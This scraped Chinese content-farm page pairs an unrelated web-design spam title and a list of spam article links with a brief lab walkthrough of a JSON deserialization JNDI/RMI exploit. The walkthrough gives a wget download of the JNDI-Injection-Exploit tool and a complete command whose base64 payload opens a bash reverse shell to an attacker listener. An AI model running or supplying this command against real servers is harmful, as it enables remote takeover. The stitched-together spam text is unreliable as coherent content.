当前位置: 首页 > news >正文

淄博网站设计丨致信网络建设能播放视频的网站

淄博网站设计丨致信网络,建设能播放视频的网站,做返利网站能赚钱的,微信插件图片转换wordpress拉取docker容器 访问并抓包 修改为POST 方式,文件类型改为json格式,发送json数据包,发送成功 这里安装一个bp的插件 使用安装的插件 可以看到,插件告诉我们这里有漏洞,并且提供了POC 既然我们发现有 rmi ,…

拉取docker容器

访问并抓包

修改为POST 方式,文件类型改为json格式,发送json数据包,发送成功

这里安装一个bp的插件

使用安装的插件

可以看到,插件告诉我们这里有漏洞,并且提供了POC 

既然我们发现有 rmi ,那么我们需要构建一个 rmi 服务器 [ JNDI ]
sudo wget https://github.com/welk1n/JNDI-Injection-Exploit/releases/download/v1.0/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
使用这个工具创建一个文件夹,如果文件夹创建成功就表示可以利用
将payload复制到bp
生成了文件夹
对反弹shell进行base64编码
把上面的反弹 shell 进行 base64 编码,然后修改成
bash -c {echo, 你的 base64 编码结果 }|{base64,-d}|{bash-i}
开启监听。然后输入命令:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c
{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Mi4xNTEvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}" -A "192.168.142.151"
成功获得反弹shell2
http://www.yayakq.cn/news/666015/

相关文章:

  • 口碑好网站建设多少钱网站推广 优帮云
  • 有哪些做问卷调查的网站好个人网站制作的主要内容
  • 深圳网站建设艺之都望野什么意思
  • asp网站没有数据库信息流广告怎么投放
  • 网站建设界面ppt演示网站模板一般用什么软件做
  • 制作公司网站要多少钱网络推广合作方式
  • 洛阳市App网站开发公司做调查表的网站
  • 金融行业网站建设大宗商品现货交易平台
  • 网站的优化用什么软件做商城网站建设哪家好
  • 建设银行江苏省分行网站帝国cms能做手机网站吗
  • 网站技术解决方案的内容用cn作网站行么
  • 网站建设3a模型是什么意思wordpress加载视频
  • 长春餐饮网站建设大连网站如何制作
  • 抚顺做网站陕西建设网成绩查询
  • 做废旧回收哪个网站好装修设计公司属于什么行业
  • 商丘网站制作费用网站建设费会计科目
  • 邯郸的网站建设网站返回503的含义是
  • 移动端网站开发全球ic采购网
  • 小程序建站模板网店服务平台
  • 柯桥区网站建设杭州建设网站的公司哪家好
  • jsp商务网站开发平湖公司网站建设
  • 企业网站cms模板大学网页设计课程
  • wordpress建哪些网站吗网站导航条
  • 邢台网站建设有哪些wordpress 邮件 key
  • h5页面制作网站免费关于wordpress
  • 网站备案的流程wordpress 主题 空白
  • 邢台做移动网站公司广州外贸型网站建设
  • 外国做美食视频网站河北百度seo点击软件
  • 百讯网站建设自助建站系统官方版
  • 临夏金属装饰网站建设定制西装